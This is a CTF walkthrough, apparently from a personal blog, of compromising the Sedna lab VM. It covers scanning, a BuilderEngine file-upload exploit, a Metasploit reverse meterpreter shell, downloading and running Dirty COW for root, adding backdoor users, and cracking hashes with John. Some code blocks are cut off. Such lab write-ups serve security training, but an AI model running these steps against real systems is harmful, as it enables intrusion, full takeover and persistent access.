CTF Sedna from Viper (hackfest 2016)

Hi everyone, I did the first Vuln VM from hackfest 2016 not long ago and i want to try this one now. It’s the second one by @ViperBlackSkull and it is the second walkthrough for me so if you need more information you can reach me on twitter at @marghost.  You can get the virtual machine HERE. So lets get started.

First of all let’s make a quick nmap and a nikto. i had already made those so i will just copy my note file. (Always open a notepad when you are hacking it is the best advice i can give to you)

[code language=”text”]
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).

111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38749/udp status
|_ 100024 1 53495/tcp status

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA
| Workgroup: WORKGROUP
|_ System time: 2017-03-17T15:38:30-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting…
+ OSVDB-3092: /system/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.

+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found

Ok so here we see many things.  First of all we have two web server, one samba server that can maybe be exploited, also a rpc server that may be used for unbound connection to the server and of course an ssh.

I tried first to find an exploit for the rpc server but i had no luck, metasploit had exploit to ddos or crash it, and other exploits required nfs.  I turn myself to the web servers.  The 80 one have a robot file that is no use.  I skip to the 8080 and tried to poke around tomcat, need to be auth to use main exploit and the default username:password did not work. I tried to bruteforce the password with the tomcat_mgr_login auxiliary scan from metasploit and noting to be found.

So i put my attention into the 80 server there is noting interesting into the /files/ directory.  The system and user directories are locked down… The readme of icon directory is noting but usefull.  I found someting interesting into the license.txt the site use builderengine.  A quick google search pointed out that i can exploit this to send a reverse php shell.

So first of all need to create the builderengine.php file that will send malicious code into the /files/ directory of the remote server.

[code language=”php”]
<!– # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0 # Date: 18/09/2016 # Exploit Author: metanubix # Vendor Homepage: http://builderengine.org/ # Software Link: http://builderengine.org/page-cms-download.html # Version: 3.5.0 # Tested on: Kali Linux 2.0 64 bit # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved" 1) Unauthenticated Unrestricted File Upload: POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ Vulnerable Parameter: files[] We can upload test.php and reach the file via the following link: /files/test.php –>
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />


After that start php server and open the builderengine.php that you just created.

[code language=”text”]php -S[/code]

Start metasploit and insert the right commands to start a web_delivery exploit

[code language=”text”]use exploit/multi/script/web_delivery
set target 1
set lhost
set payload php/meterpreter/reverse_tcp

When you will run the exploit it will give you an adress, just create a remotexploit.php file and fill it like this :

[code language=”php”]<?php

Now use the delivery form to upload this little php gift from metasploit. Then you will be prompted by metasploit to open a session

[code language=”text”]sessions -i 1[/code]

[code language=”text”]python -c ‘import pty; pty.spawn("/bin/bash")'[/code]

Done i have a shell! First win.

A quick view tell me that this linux kernel is vulnerable to the Dirty Dirty Cow exploit

[code language=”text”]www-data@Sedna:/var/www$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux [/code]

Sooo exploiting dirty cow

[code language=”bash”]curl https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c

<githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4805 100 4805 0 0 29333 0 –:–:– –:–:– –:–:– 29478
www-data@Sedna:/var/www/html/files$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@Sedna:/var/www/html/files$ ./dirty
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
mmap: b77cc000
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON’T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
mmap: b77cc000
madvise 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON’T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!! – Meterpreter session 1 closed. Reason: Died[/code]

When exploited, ruuuun to ssh and login as fast as you can.  You are on the edge as dirty cow is unstable as FU** and can cause a kernel panic anytime.  To make it stable you need to enter a line of code.

[code language=”bash”]echo 0 > /proc/sys/vm/dirty_writeback_centisecs[/code]

It should look like this :

[code language=”bash”]root@kali:~# ssh [email protected]
[email protected]’s password:
Added user firefart.

Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Mar 20 08:25:24 EDT 2017

System load: 0.15 Memory usage: 2% Processes: 57
Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:

Last login: Sun Mar 12 00:41:47 2017 from
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# adduser pwned
Adding user `pwned’ …
Adding new group `pwned’ (1001) …
Adding new user `pwned’ (1001) with group `pwned’ …
Creating home directory `/home/pwned’ …
Copying files from `/etc/skel’ …
no talloc stackframe at ../source3/param/loadparm.c:4864, leaking memory
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwned
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
firefart@Sedna:~# usermod -aG sudo pwned[/code]

As you can see here the line of code is pushed right after the ssh login and i make a root user right after just in case something goes wrong.

I am groot! It’s another win :p

Now we go fishing for flags.  Found the two first flags the easy way by making a search as root :

firefart@Sedna:/# find . -name "flag.txt"
firefart@Sedna:/# cat /var/www/flag.txt
firefart@Sedna:/# cat /root/flag.txt

Ok now i need to find the two post exploit flags. My first reflex was to go and investigate the /files/users/ directory of the 80 server…
this was a dead end. Next ting to snoop in was the tomcat install that i was not able to login even if i tried to bruteforce the password.

so a little google search pointed me that tomcat passwords are inside ‘/etc/tomcat7/tomcat-users.xml’

This is what i found

[code language=”xml”]<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>

Looks like i found a flag!

Now it is time to login into the tomcat server.  Noting to be found there.

I snooped a little more around.  noting to see from running process (ps -aux | less).

No special cron was used.  (/etc/crontab)

I found it!!! an user named crackmeforpoints is inside the user list (cut -d: -f1 /etc/passwd)

so i will try to john my way to this password over night… almost done!

[code language=”bash”]root@kali:~/Downloads# john ./crack.password.db</pre>
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "–format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press ‘q’ or Ctrl-C to abort, almost any other key for status[/code]

Ok after a night John the crazy didn’t crack the password so it is a little more complex that I as expected.  I got the flag and the job is done for me :).  Have a nice day and I will send you in the next walkthrough.


Leave a Reply

Your email address will not be published. Required fields are marked *